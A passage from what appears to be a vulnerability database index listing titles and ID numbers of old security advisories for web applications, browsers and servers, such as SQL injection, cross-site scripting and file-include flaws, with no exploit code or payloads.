'tip.php' SQL Injection Vulnerability [29966] EasySiteNetwork Riddles Complete Website 'riddle.php' SQL Injection Vulnerability [29930] Webdevindo-CMS 'hal' Parameter SQL Injection Vulnerability [29927] WebGUI Collaboration RSS Information Disclosure Vulnerability [29836] Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow Vulnerability [29813] Academic Web Tools CMS 1.4.2.8 Multiple Input Validation Vulnerabilities [29806] Easy Webstore 'index.php' SQL Injection Vulnerability [29804] nweb2fax Multiple Remote Vulnerabilities [29795] aspWebCalendar 'calendar_admin.asp' Arbitrary File Upload Vulnerability [29783] WebCalendar 'tools/send_reminders.php' Remote File Include Vulnerability [29753] NITRO Web Gallery 'albums.php' SQL Injection Vulnerability [29748] Webmatic Multiple SQL Injection and Cross-Site Scripting Vulnerabilities [29721] Advanced Webhost Billing System 'news.php' SQL Injection Vulnerability [29713] PHP JOBWEBSITE PRO 'JobSearch3.php' SQL Injection Vulnerability [29711] WebChamado 'lista_anexos.php' SQL Injection Vulnerability [29701] WebChamado 'admin/corpo.php' Unauthorized Access Vulnerability [29690] Xerox Multiple Copier/Printer Models Web Server Unspecified HTML Injection Vulnerability [29689] Xerox WorkCentre Webserver Unspecified HTML Injection Vulnerability [29684] Opera Web Browser 9.27 Multiple Security Vulnerabilities [29612] Real Estate Website 'location.asp' Multiple Input Validation Vulnerabilities [29610] RETIRED:Kronos webTA Project Management Module Multiple HTML Injection Vulnerabilities [29595] Galatolo WebManager 'com' Parameter Local File Include Vulnerability [29587] Akamai Red Swoosh Client Web Server Cross-Site Request Forgery Vulnerability [29580] WEBalbum 'photo_add-c.php' HTML Injection Vulnerability [29558] BackWeb 'LiteInstActivator.dll' ActiveX Control Buffer Overflow Vulnerability [29545] BitKinex FTP LIST and WebDAV PROPFIND Commands Multiple Directory Traversal Vulnerabilities [29543] IBM WebSphere Application Server SOAP Security Header Unspecified Vulnerability [29501] Apple Mac OS X Image Capture Webserver Directory Traversal Vulnerability [29496] SMEWeb SQL Injection and Multiple Cross-Site Scripting Vulnerabilities [29436] Kent WEB MART Unspecified Cross Site Scripting Vulnerability [29355] Sun Java System Web Server Advanced Search Mechanism Cross-Site Scripting Vulnerability [29332] Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities [29317] SAP Web Application Server '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting Vulnerability [29311] IBM Lotus Domino Web Server Unspecified Cross Site Scripting Vulnerability [29310] IBM Lotus Domino Web Server 'Accept Language' HTTP Header Buffer Overflow Vulnerability [29296] Web Slider 'slide' Parameter SQL Injection Vulnerability [29266] CMS WebManager-Pro Multiple SQL Injection Vulnerabilities [29263] How2ASP.net Webboard 'showQAnswer.asp' SQL Injection Vulnerability [29257] Archangel Management Weblog 'index.php' SQL Injection Vulnerability [29256] StanWeb CMS 'default.asp' SQL Injection Vulnerability [29246] Web Slider 'admin' Cookie Parameter Authentication Bypass Vulnerability [29194] Symantec Altiris Deployment Solution Agent User Interface Local Privilege Escalation Vulnerability [29188] WGCC Web Group Communication Center Cross-Site Scripting and SQL Injection Vulnerabilities [29121] Microsoft Outlook Web Access 'no-store' HTTP Directive Information Disclosure Weakness [29115] myWebland miniBloggie 'del.php' Security Bypass Vulnerability [29088] Sun Java System Application Server and Web Server JSP Information Disclosure Vulnerability [29087] Sun Java System Web Server Search Module Cross-Site Scripting Vulnerability [29061] Intesync LLC Miniweb 2.0 Blog Writer Module 'historymonth' Parameter SQL Injection Vulnerability [29031] WebMod Multiple Remote Security Vulnerabilities [29011] Apple Safari WebKit Unspecified Heap Overflow Vulnerability [29000] Joomla! and Mambo Webhosting Component 'catid' Parameter SQL Injection Vulnerability [28997] IBM WebSphere Application Server Java Plugin Security Bypass Vulnerability [28988] WebGUI Data Form Unspecified Security Vulnerability [28971] Softbiz Web Host Directory Script 'search_result.php' SQL Injection Vulnerability [28921] Web Calendar Pro 'one_day.php' SQL Injection Vulnerability [28907] RSA Authentication Agent for Web URI Redirection Vulnerability [28898] Horde Webmail 'addevent.php' Cross-Site Scripting Vulnerability [28895] Akiva WebBoard HTML Injection Vulnerability [28850] Voice of Web AllMyGuests 'AMG_id' SQL Injection Vulnerability [28848] Azureus HTML WebUI Cross-Site Request Forgery Vulnerability [28847] uTorrent WebUI Cross-Site Request Forgery Vulnerability [28838] Grape Web Statistics 'functions.php' Remote File Include Vulnerability [28815] Apple Safari WebKit JavaScript Regular Expression Repetition Counts Buffer Overflow Vulnerability [28814] Apple Safari WebKit URI Handling Cross-Site Scripting Vulnerability [28729] EMC DiskXtender MediaStor RPC Interface Format String Vulnerability [28721] WinWebMail IMAP Login Data Handling Denial Of Service Vulnerability [28693] Squid Web Proxy Cache 'arrayShrink()' Remote Denial of Service Vulnerability [28647] OTRS SOAP Interface Security Bypass Vulnerability [28631] Web Server Creator 'langfile' Parameter Remote File Include Vulnerability [28628] Interwoven WorkSite Web 'iManFile.cab' TransferCtrl Class ActiveX Control Double Free Vulnerability [28602] Borland StarTeam Multicast Service 'GMWebHandler::parse_request()' Buffer Overflow Vulnerability [28600] Secure Computing Webwasher Malformed URL Remote Denial of Service Vulnerability [28597] Drupal Webform Module Multiple Unspecified HTML Injection Vulnerabilities [28593] Parallels Virtuozzo Containers VZPP Interface Change Pass Cross-Site Request Forgery Vulnerability [28589] Parallels Virtuozzo Containers VZPP Interface File Manger Cross-Site Request Forgery Vulnerability [28585] Opera Web Browser 9.26 Multiple Security Vulnerabilities [28534] Neat weblog 'articleId' Parameter SQL Injection Vulnerability [28515] mx_blogs Weblogs Module for mxBB 'mx_root_path' Parameter Remote File Include Vulnerability [28492] Apple Safari WebKit 'calculateCompiledPatternLength()' Remote Code Execution Vulnerability [28476] JAF CMS 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities [28436] Aeries Browser Interface Multiple SQL Injection and Cross-Site Scripting Vulnerabilities [28425] HIS WebShop 'his-webshop.pl' Directory Traversal Vulnerability [28416] F5 Big-IP Web Management Audit Log HTML Injection Vulnerability [28400] My Web Doc Administration Pages Multiple Authentication Bypass Vulnerabilities [28393] Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities [28356] Apple Safari CFNetwork Arbitrary Secure Website Spoofing Vulnerability [28347] Apple Safari Web Inspector Remote Code Injection Vulnerability [28342] Apple Safari WebKit Frame Method Cross-Site Scripting Vulnerability [28338] Apple Safari WebKit JavaScript Regular Expression Handling Buffer Overflow Vulnerability [28337] Apple Safari WebCore History Object Cross-Site Scripting Vulnerability [28336] Apple Safari WebCore 'document.domain' Variant Cross-Site Scripting Vulnerability [28335] Apple Safari WebCore Java Frame Navigation Cross-Site Scripting Vulnerability [28332] Apple Safari WebCore 'window.open()' Function Cross-Site Scripting Vulnerability [28330] Apple Safari WebCore 'document.domain' Cross-Site Scripting Vulnerability [28326] Apple Safari WebCore 'Kotoeri' Password Field Information Disclosure Vulnerability [28307] CUPS CGI Interface Remote Buffer Overflow Vulnerability [28294] webSPELL 'index.php' Cross-Site Scripting Vulnerability [28280] WEBalbum 'photo_add.php' Security Bypass Vulnerability [28277] RSA WebID 'IISWebAgentIF.dll' Cross-Site Scripting Vulnerability [28256] eXV2 CMS WebChat Module 'roomid' Parameter SQL Injection Vulnerability [28235] IBM WebSphere MQ for HP NonStop Security Bypass Vulnerability [28216] IBM WebSphere Prior to 6.1.0.15 Multiple Vulnerabilities [28207] Adobe ColdFusion Administration Interface Failed Login Audit Vulnerability [28155] Sun Java Web Console Information Disclosure Weakness [28148] Neptune Web Server 404 Error Page Cross Site Scripting Vulnerability [28136] Microsoft Office Web Components ActiveX Control DataSource Remote Code Execution Vulnerability [28135] Microsoft Office Web Components ActiveX Control URL Parsing Remote Code Execution Vulnerability [28123] Ruby WEBrick Remote Directory Traversal and Information Disclosure Vulnerabilities [28115] Xitex WebContent M1 'redirect.do' Cross-Site Scripting Vulnerability [28107] WebCT Email and Discussion Board Messages HTML Injection Vulnerability [28067] PHP WEB SCRIPT Dynamic Photo Gallery 'album.php' SQL Injection Vulnerability [28046] IBM WebSphere MQ Security Bypass Vulnerability [28037] Juniper Networks Secure Access 2000 Web Root Path Disclosure Vulnerability [28023] D-Bus 'send_interface' Attribute Security Policy Bypass Vulnerability [28006] Android Web Browser BMP File Integer Overflow Vulnerability [28005] Android Web Browser GIF File Heap-Based Buffer Overflow Vulnerability [27997] Rising Web Scan Object 'OL2005.dll' ActiveX Control Remote Code Execution Vulnerability [27990] SurgeMail and WebMail 'Page' Command Remote Format String Vulnerability [27989] PORAR Webboard 'question.asp' SQL Injection Vulnerability [27962] Portail Web Php Multiple Remote And Local File Include Vulnerabilities [27948] Citrix MetaFrame Web Manager 'login.asp' Cross-Site Scripting Vulnerability [27901] Opera Web Browser 9.25 Multiple Security Vulnerabilities [27894] PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability [27875] webcamXP Multiple Information Disclosure and Denial of Service Vulnerabilities [27869] WebGUI Username HTML Injection Vulnerability [27838] XPWeb 'Download.php' File Disclosure Vulnerability [27826] Multiple Web Browser BMP Partial Palette Information Disclosure and Denial Of Service Vulnerability [27797] artmedic webdesign weblog Multiple Local File Include Vulnerabilities [27779] Site2Nite Real Estate Web 'agentlist.asp' Multiple SQL Injection Vulnerabilities [27745] artmedic webdesign weblog Multiple Cross-Site Scripting Vulnerabilities [27723] Softwebs Nepal Fast Chat 'loginprg.asp' Cross-Site Scripting Vulnerability [27685] Website Meta Language Multiple Local Insecure Temporary File Creation Vulnerabilities [27670] Microsoft Windows WebDAV Mini-Redirector Heap Overflow Vulnerability [27665] IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Vulnerability [27662] Webmin Search Feature Cross-Site Scripting Vulnerability [27621] VHD Web Pack 'index.php' Local File Include Vulnerability [27616] Portail Web Php 'site_path' Multiple Remote File Include Vulnerabilities [27582] Novell GroupWise WebAccess Multiple Cross Site Scripting Vulnerabilities [27580] Namo Web Editor 'NamoInstaller.dll' ActiveX Control Remote Buffer Overflow Vulnerability [27517] webSPELL 'whoisonline.php' Cross-Site Scripting Vulnerability [27461] WebCalendar Multiple HTML Injection and Cross-Site Scripting Vulnerabilities [27453] Namo Web Editor 'NamoInstaller.dll' ActiveX Control Arbitrary Command Execution Vulnerability [27433] IBM AIX WebSM Remote Client For Linux Local Insecure File Permissions Vulnerability [27420] Web Wiz Rich Text Editor Arbitrary HTML File Creation Vulnerability [27419] Multiple Web Wiz Products Remote Information Disclosure Vulnerability [27405] EasySiteNetwork Recipe Website Script 'list.php' SQL Injection Vulnerability [27400] IBM WebSphere Prior to 6.0.2.25 Multiple Remote Vulnerabilities [27389] IBM WebSphere Business Modeler Repository Arbitrary File Deletion Vulnerability [27383] Small Axe Weblog 'ffile' Parameter Remote File Include Vulnerability [27371] IBM WebSphere Application Server serveServletsByClassnameEnabled Info Disclosure Vulnerability [27364] 360 Web Manager 'form.php' SQL Injection Vulnerability [27345] Small Axe Weblog 'linkbar.php' Remote File Include Vulnerability [27338] Skype Web Content Zone Remote Code Execution Vulnerability [27330] Site2Nite Real Estate Web 'default.asp' Multiple SQL Injection Vulnerabilities [27319] MiniWeb Directory Traversal and Buffer Overflow Vulnerabilities [27312] MailBee WebMail Pro 'download_view_attachment.aspx' Local File Include Vulnerability [27261] Apple Safari KHTML WebKit Remote Denial of Service Vulnerability [27223] Horde IMP and Groupware Webmail Edition Multiple Input Validation Vulnerabilities [27202] PHP Webquest MySQL Credentials Information Disclosure Vulnerability [27196] Tuned Studios Multiple Webpage Templates 'index.php' Remote File Include Vulnerability [27193] Gateway CWebLaunchCtl ActiveX Control Command Execution and Remote Buffer Overflow Vulnerability [27192] PHP Webquest 'soporte_horizontal_w.php' SQL Injection Vulnerability [27147] SAM Broadcaster samPHPweb 'songinfo.php' SQL Injection Vulnerability [27145] WebPortal CMS 'action.php' Unauthorized Access Vulnerability [27137] SAM Broadcaster samPHPweb 'db.php' Remote File Include Vulnerability [27106] DivX Web Player 'npUpload.dll' ActiveX Control Remote Denial of Service Vulnerability [27092] AGENCY4NET WEBFTP 'download2.php' Local File Include Vulnerability [27090] phpWebSite Search Module Cross-Site Scripting Vulnerability [27088] WebPortal CMS 'index.php' SQL Injection Vulnerability [27031] Web Sihirbazi 'default.asp' Multiple SQL Injection Vulnerabilities [27013] Macrovision InstallShield Update Service 'isusweb.dll' Remote Buffer Overflow Vulnerability [26984] Wallpaper Complete Website 'category.php' SQL Injection Vulnerability [26978] Sun Java Web Proxy Server and Sun Java Web Server Multiple Cross-Site Scripting Vulnerabilities [26972] IBM Lotus Domino Web Access ActiveX Control Memory Corruption Vulnerabilities [26962] Aeries Browser Interface 'LostPwd.asp' SQL Injection Vulnerability [26937] Opera Web Browser Multiple Security Vulnerabilities [26916] iMesh 'IMWebControl' ActiveX Control Code Execution Vulnerability [26915] Google Web Toolkit Benchmark Reporting System Unspecified Cross-Site Scripting Vulnerability [26895] Ganglia Web Frontend Multiple Cross-Site Scripting Vulnerabilities [26894] FreeWebshop Cookie Security Bypass Vulnerability [26889] Black Sheep Web Software Form Tools Multiple Remote File Include Vulnerabilities [26886] FreeWebshop Multiple SQL Injection Vulnerabilities [26873] WebGUI Secondary Admin Security Bypass Vulnerability [26861] Hitachi Web Server 'imagemap' Cross-Site Scripting Vulnerability [26858] Hitachi Web Server DirectoryIndex Cross-Site Scripting Vulnerability [26852] DynaWeb Developers MMS Gallery 'id' Parameter Multiple Directory Traversal Vulnerabilities [26847] Websense User-Agent Spoofing Filtering Security Bypass Vulnerability [26843] BEA WebLogic Mobility Server Image Converter Unspecified Unauthorized Access Vulnerability [26821] Mcms Easy Web Make Template Parameter Local File Include Vulnerability [26806] Perforce P4Web Content-Length Header Remote Denial Of Service Vulnerability [26805] BarracudaDrive Web Server Denial of Service and Multiple Input Validation Vulnerabilities [26800] Roundcube Webmail CSS Expression Input Validation Vulnerability [26793] Websense Reporting Tools Login Page Cross-Site Scripting Vulnerability [26787] webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities [26779] Dominion Web DWdirectory Search Parameter SQL Injection Vulnerability [26771] Easy File Sharing Web Server Directory Traversal and Multiple Information Disclosure Vulnerabilities [26761] WebDoc Multiple SQL Injection Vulnerabilities [26747] SERWeb Multiple Remote and Local File Include Vulnerabilities [26734] IBM Lotus Sametime Server WebRunMenuFrame Cross-Site Scripting Vulnerability [26721] Opera Web Browser Bitmap File RLE Remote Denial Of Service Vulnerability [26686] Microsoft Web Proxy Auto-Discovery Proxy Spoofing Vulnerability [26669] Multiple Vendor Web Browser JavaScript Multiple Fields Key Filtering Vulnerability [26641] Web-MeetMe Play.PHP Multiple Local File Include Vulnerabilities [26640] WebED Multiple Index.PHP Local File Include Vulnerabilities [26628] eBASEweb Unspecified SQL Injection Vulnerability [26584] Proverbs Web Calendar Password Parameter SQL Injection Vulnerability [26563] WorkingOnWeb Events.PHP SQL Injection Vulnerability [26515] FileMaker Instant Web Publishing Cross Site Scripting Vulnerability [26501] Multiple Web Browsers SSL Certificate SubjectAltName Validation Weakness [26464] AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities [26457] IBM WebSphere Application Server WebContainer HTTP Request Header Security Weakness [26441] IBM WebSphere MQ Multiple Unspecified Remote Memory Corruption Vulnerabilities [26430] WebEx GPCContainer Memory Access Violation Multiple Denial of Service Vulnerabilities [26424] RSA Authentication Agent IISWebAgentIF.DLL Remote Stack Based Buffer Overflow Vulnerability [26419] VTLS Web Gateway Searchtype Parameter Cross-Site Scripting Vulnerability [26405] Microsoft Office Web Component Memory Access Violation Denial of Service Vulnerability [26375] Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Vulnerability [26366] MyWebFTP Pass.PHP Hashed Password Information Disclosure Vulnerability [26364] Cisco Unified MeetingPlace Web Conference Login Multiple Cross Site Scripting Vulnerabilities [26358] Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability [26310] Firefly Media Server Webserver.C Multiple Format String Vulnerabilities [26298] IBM Lotus Domino Web Server Unspecified Cross-Site Scripting Security Vulnerability [26280] Macrovision InstallShield Update Service Isusweb.DLL Multiple Remote Code Execution Vulnerabilities [26276] IBM WebSphere Application Server UDDI Console Multiple Input Validation Vulnerabilities [26271] Hitachi Web Server HTML Injection Vulnerability and Signature Forgery Vulnerability [26236] Gretech GOM Player GomWeb3.DLL Remote Buffer Overflow Vulnerability [26207] Aleris Web Publishing Server Page.ASP SQL Injection Vulnerability [26193] CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability [26166] Mono System.Web StaticFileHandler.CS Source Code Information Disclosure Vulnerability [26165] The Online Web Library Site Scripture.PHP Remote File Include Vulnerability [26164] WebIf Webif.exe Cross-Site Scripting Vulnerability [26163] LiteSpeed Web Server Null-Byte Handling Information Disclosure Vulnerability [26125] Drupal Weblinks Multiple Unspecified HTML Injection Vulnerabilities [26102] Opera Web Browser Frame Functions Same Origin Policy Bypass Vulnerability [26100] Opera Web Browser External Applications Arbitrary Code Execution Vulnerability [26087] WebMod AUTH.W Cross-Site Scripting Vulnerability [26078] IBM WebSphere Application Server Administrative Scripting Tools Unspecified Vulnerability [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability [26030] WebDesktop Multiple Remote File Include Vulnerabilities [26013] Computer Associates eTrust ITM (Threat Manager) Web Console URI Redirection Vulnerability [26004] Kaspersky Online Scanner KAVWebScan.DLL ActiveX Control Format String Vulnerability [25999] Webmaster-Tips.net Joomla! RSS Feed Reader Remote File Include Vulnerability [25988] Interstage Application Server Web Root Path Disclosure Vulnerability [25981] NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities [25975] TYPOlight webCMS preview.php Arbitrary File Download Vulnerability [25959] Webmaster-Tips.net Joomla! WMT Portfolio Remote File Include Vulnerability [25958] Webmaster-Tips.net Joomla! Flash Image Gallery Component Remote File Include Vulnerability [25946] Webmaster-Tips.net Joomla! Panoramic Component Remote File Include Vulnerability [25942] MailBee WebMail Pro Multiple Cross Site Scripting Vulnerabilities [25940] Web Host Automation Helm Multiple Cross-Site Scripting Vulnerabilities [25926] Deonix Web Templates Management Index.PHP SQL Injection Vulnerability [25920] Sun Java WebStart Multiple File Access And Information Disclosure Vulnerabilities [25814] Sun Solaris Human Interface Device Local Denial of Service Vulnerability [25773] Webmin Unspecified Command Execution Vulnerability [25767] GreenSQL Web Management Tool Multiple HTML Injection Vulnerabilities [25757] Barracuda Spam Firewall Web Administration Console Username HTML Injection Vulnerability [25751] Xunlei Web Thunder ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability [25745] PhpWebGallery Picture.PHP HTML Injection Vulnerability [25744] WebBatch WebBatch.EXE Cross-Site Scripting and Information Disclosure Vulnerabilities [25734] Sun Java Web Start dnsResolve ActiveX Control Buffer Overflow Vulnerability [25689] TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities [25668] PHP Webquest Soporte_Derecha_W.PHP Parameter SQL Injection Vulnerability [25626] IBM WebSphere Application Server Edge Component Unspecified Vulnerability [25592] Webace Linkscript start.php SQL Injection Vulnerability [25588] Buffalo AirStation WHR-G54S Web Management Cross-Site Request Forgery Vulnerability [25535] WebOddity Web Server Directory Traversal Vulnerability [25526] 212cafe Webboard Read.PHP SQL Injection Vulnerability [25506] Weblogicnet Files_Dir Multiple Remote File Include Vulnerabilities [25472] BEA WebLogic Server Null Cipher Suite Multiple Information Disclosure Vulnerabilities [25406] Ripe Website Manager Multiple SQL and HTML Injection Vulnerabilities [25390] Planet VC-200M VDSL2 Router Administration Interface Remote Denial Of Service Vulnerability [25335] Systeme de vote pour site Web Multiple Remote File Include Vulnerabilities [25331] Opera Web Browser Invalid Pointer Remote Code Execution Vulnerability [25292] Prozilla Webring Website Script Category.PHP SQL Injection Vulnerability [25261] WebCart Multiple Unspecified Cross-Site Scripting Vulnerabilities [25257] Mapos-Scripts.de WebNews Multiple Remote File Include Vulnerabilities [25237] Cisco Unified MeetingPlace Web Conference Multiple Cross Site Scripting Vulnerabilities [25192] Xunlei Web Thunder ThunderServer.webThunder.1 ActiveX AddCategory File Download Vulnerability [25190] Sun Java System Web Server Multiple HTTP Redirect Vulnerabilities [25175] Open WebMail Multiple Cross-Site Scripting Vulnerabilities [25166] WebDirector Index.PHP Cross Site Scripting Vulnerability [25164] WikiWebWeaver Index.PHP Arbitrary File Upload Vulnerability [25148] WebEvent Webevent.CGI Cross-Site Scripting Vulnerability [25126] Novell GroupWise WebAccess User.Id Parameter Cross Site Scripting Vulnerability [25115] Real Estate Listing Website Application Template Login Dialog SQL Injection Vulnerability [25114] Pay Roll Time Sheet and Punch Card Application With Web UI Login.ASP SQL Injection Vulnerability [25091] ADempiere Bazaar WebUI Unspecified Authentication Bypass Vulnerability [25089] Advanced Webhost Billing System Multiple Vulnerabilities [25061] Web Yapar Multiple SQL Injection Vulnerabilities [25045] Webbler CMS Mail A Friend Open Email Relay Vulnerability [25040] Webbler CMS Index.PHP Multiple Cross-Site Scripting Vulnerabilities [25033] IBM WebSphere Application Server 6.0.2.19 Unspecified Vulnerability [25012] Webspell Index.PHP Local File Include Vulnerability [24977] TeamSpeak WebServer Remote Denial Of Service Vulnerability [24970] Opera Web Browser Dangling Pointer Remote Code Execution Vulnerability [24936] Marshal MailMarshal SMTP Spam Quarantine Interface User Password Change Vulnerability [24918] RETIRED: Konqueror Web Browser Data: URL Scheme Address Bar Spoofing Vulnerability [24917] Opera Web Browser Address Bar URI Spoofing Vulnerability [24913] Citadel WebCit Multiple Input Validation Vulnerabilities [24900] activeWeb contentserver Permissions Bypass Weakness [24898] ActiveWeb Contentserver CMS Client Side Filtering Bypass Vulnerability [24896] ActiveWeb Contentserver Mimetype Name HTML Injection Vulnerability [24895] ActiveWeb Contentserver Multiple Cross-Site Scripting Vulnerabilities [24894] ActiveWeb Contentserver Picture_Real_Edit.ASP SQL Injection Vulnerability [24878] Webmatic Multiple SQL Injection Vulnerabilities [24832] Sun Java Runtime Environment Web Start JNLP File Stack Buffer Overflow Vulnerability [24779] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability [24773] SAP DB Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities [24722] Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities [24714] WebApp.org and WebApp.net Multiple Input Validation Vulnerabilities [24701] WebChat Login.PHP SQL Injection Vulnerability [24697] Oracle Rapid Install Web Server Secondary Login Page Cross Site Scripting Vulnerability [24695] Sun Java Web Start Arbitrary File Overwrite Privilege Escalation Vulnerability [24676] SAP NetWeaver and Web Dynpro Java Cross-Site Scripting Vulnerability [24664] Eva-Web Index.PHP3 Multiple Remote File Include Vulnerabilities [24628] LiteWEB Web Server Invalid Page Remote Denial of Service Vulnerability [24623] Key Focus Web Server Index.WKF Cross-Site Scripting Vulnerability [24608] IBM WebSphere Application Server Closed Connection Information Disclosure Vulnerability [24598] Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability [24597] Apple WebKit Invalid Type Conversion Remote Code Execution Vulnerability [24581] SerWeb Load_Lang.PHP Remote File Include Vulnerability [24552] Xunlei Web Thunder ThunderServer.webThunder.1 ActiveX Control Arbitrary File Download Vulnerability [24550] RETIRED: W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability [24516] WebIf OutConfig Parameter Local File Include Vulnerability [24505] IBM WebSphere Application Server Unspecified Vulnerabilities [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability [24456] Mbedthis AppWeb HTTP TRACE Information Disclosure Vulnerability [24454] Mbedthis AppWeb URL Protocol Format String Vulnerability [24448] RETIRED: Microsoft Internet Explorer Navigation Cancel Webpage Spoofing Vulnerability [24419] WebWiz Rich Text Editor Topics Page HTML Injection Vulnerability [24381] Webmin Pam_Login.CGI Multiple Unspecified Cross-Site Scripting Vulnerabilities [24375] MiniWeb HTTP POST Headers Remote Denial of Service Vulnerability [24373] Blue Coat Systems K9 Web Protection Remote Buffer Overflow Vulnerability [24364] W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability [24355] Yahoo! Messenger Webcam Viewer ActiveX Control Buffer Overflow Vulnerability [24354] Yahoo! Messenger Webcam Upload ActiveX Control Buffer Overflow Vulnerability [24352] Opera Web Browser Basic Authentication Server Domain Spoofing Vulnerability [24310] WebSVN Filedetails.PHP Cross-Site Scripting Vulnerability [24307] IBM Lotus Domino Web Server Unspecified Remote Denial of Service Vulnerability [24298] Microsoft Internet Explorer Location Object Webpage Spoofing Vulnerability [24297] WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability [24240] IBM Web-based System Manager Unspecified Denial of Service Vulnerability [24219] British Telecommunications Consumer Webhelper Multiple Buffer Overflow Vulnerabilities [24216] British Telecommunications Webhelper Multiple Buffer Overflow Vulnerabilities [24184] Yahoo! Messenger Webcam Viewer YWCVWR.DLL ActiveX Control Denial of Service Vulnerability [24174] Zindizayn Okul Web Sistemi Multiple SQL Injection Vulnerabilities [24165] Sun Java Web Proxy Server Multiple Buffer Overflow Vulnerabilities [24164] Webavis Class.PHP Remote File Include Vulnerability [24130] WebGUI ViewList Security Bypass Vulnerability [24092] rdiffWeb Directory Traversal Vulnerability [24081] GNU GNATS Gnatsweb.PL Cross-Site Scripting Vulnerability [24080] Opera Web Browser Torrent File Handling Buffer Overflow Vulnerability [24059] Madirish Webmail GLOBALS[basedir] Parameter Remote File Include Vulnerabilities [24022] VDECK WebMail PrintCal.PL Cross-Site Scripting Vulnerability [23979] Multiple BEA WebLogic Applications Multiple Vulnerabilities [23970] Tools 4 Web News-Script NewsAdmin.PHP Remote File Include Vulnerability [23962] Webdesproxy GET Request Buffer Overflow Vulnerability [23950] CommuniGate Pro Web Mail HTML Injection Vulnerability [23908] NetWin WebMail Unspecified Vulnerability [23856] TurnkeyWebTools SunShop Shopping Cart Multiple Input Validation Vulnerabilities [23847] Mini Web Shop Multiple Cross Site Scripting Vulnerabilities [23846] Archangel Weblog Local File Include And Authentication Bypass Vulnerabilities [23806] Microsoft Outlook Web Access Remote Script Injection Vulnerability [23778] Progress WebSpeed Denial Of Service Vulnerability [23728] Sun Java Web Start Unauthorized Access Vulnerability [23713] Pi3Web Overly Long HTTP Request Denial Of Service Vulnerability [23668] Multiple Web Browsers Digest Authentication HTTP Response Splitting Vulnerability [23662] TurnkeyWebTools Sunshop Multiple Remote File Include Vulnerabilities [23649] Asterisk ManagerInterface Manager.Conf Remote Denial of Service Vulnerability [23634] Progress Webspeed _CPYFile.P Unauthorized Access Vulnerability [23633] Advanced Webhost Billing System Cart2.PHP Remote File Include Vulnerability [23597] Ripe Website Manager Multiple Input Validation Vulnerabilities [23592] WEBinsta FM Manager Admin Cookies Remote File Include Vulnerability [23556] Novell Groupwise WebAccess GWINTER.EXE Remote Buffer Overflow Vulnerability [23539] Sun Java Web Console LibWebconsole_Services.SO Format String Vulnerability [23511] TurnkeyWebTools Sunshop Multiple Remote File Include Vulnerabilities [23499] Web Service Deluxe News Manager Deluxe Footer.PHP Local File Include Vulnerability [23493] Web Slider Multiple Remote File Include Vulnerabilities [23481] MailBee WebMail Pro Check_login.ASP Cross-Site Scripting Vulnerability [23451] WebKalk2 Engine.Inc.PHP Remote File Include Vulnerability [23448] PHPWebNews Multiple Cross-Site Scripting Vulnerabilities [23437] Opera Web Browser Running Adobe Flash Player Information Disclosure Vulnerability [23423] webMethods Glue Console Directory Traversal Vulnerability [23421] IBM Lotus Domino Web Access Active Content Filter HTML Injection Vulnerability [23413] Miniwebsvr Server Directory Traversal Vulnerability [23348] WebSpell Picture.PHP Multiple Local File Include Vulnerabilities [23276] Microsoft Windows Graphics Device Interface Font Rasterizer Local Privilege Escalation Vulnerability [23268] Advanced Website Creator SQL Injection Vulnerabilities [23182] Data Domain Administration Interface Local Privilege Escalation Vulnerability [23179] NaviCopa Web Server GET Request Buffer Overflow Vulnerability [23173] IBM Lotus Domino Web Access Email Message HTML Injection Vulnerability [23171] AY System Solutions Web Content System Remote File Include Vulnerability [23156] SB-WebSoft Addressbook Local File Include Vulnerability [23136] Horde Groupware Webmail Edition Unspecified Parameters Multiple HTML Injection Vulnerabilities [23131] WebFormatique Car Manager Joomla Component Index.PHP SQL Injection Vulnerability [23109] Multiple ActiveWebSoftwares Products Default.ASP SQL Injection Vulnerability [23098] ASPWebCalendar Calendar.ASP SQL Injection Vulnerability [23095] ClassWeb Language.PHP Remote File Include Vulnerability [23086] IBM WebSphere Application Server Unspecified HTTP Response Splitting Vulnerability [23054] WebCalendar IncludeDir Multiple Remote File Include Vulnerabilities [23051] Web Wiz Forums String Filtering SQL Injection Vulnerability [22995] Cyber-Inside WebLog Local File Include Vulnerability [22993] Sun Java System Web Server Unspecified Unauthorized Access Vulnerability [22991] IBM WebSphere Application Server Source Code Disclosure Vulnerability [22979] Viper Web Portal Index.PHP Remote File Include Vulnerability [22975] Horde IMP Webmail Client Multiple Input Validation Vulnerabilities [22974] GrafX Company Website Builder Pro Comanda.PHP Remote File Include Vulnerability [22973] Sun Java System Web Server Certificate Revocation Access Control Bypass Vulnerability [22953] WebCreator Multiple Remote File Include Vulnerabilities [22877] Webo FolderTree.PHP Remote File Include Vulnerability [22859] Sun Ipmitool Interface Remote Unauthorized Access Vulnerability [22834] WebCalendar Certain Variable Overwrite Vulnerability [22800] Bernard Joly Webring HTML Injection Vulnerability [22798] WebSpell Multiple Input Validation Vulnerabilities [22788] WebMod Content Length Stack Buffer Overflow Vulnerability [22781] aWebNews Multiple Remote File Include Vulnerabilities [22776] DivX Web Player NPDIVX32.DLL ActiveX Control Resize Method Remote Denial of Service Vulnerability [22755] EmbeddedWB 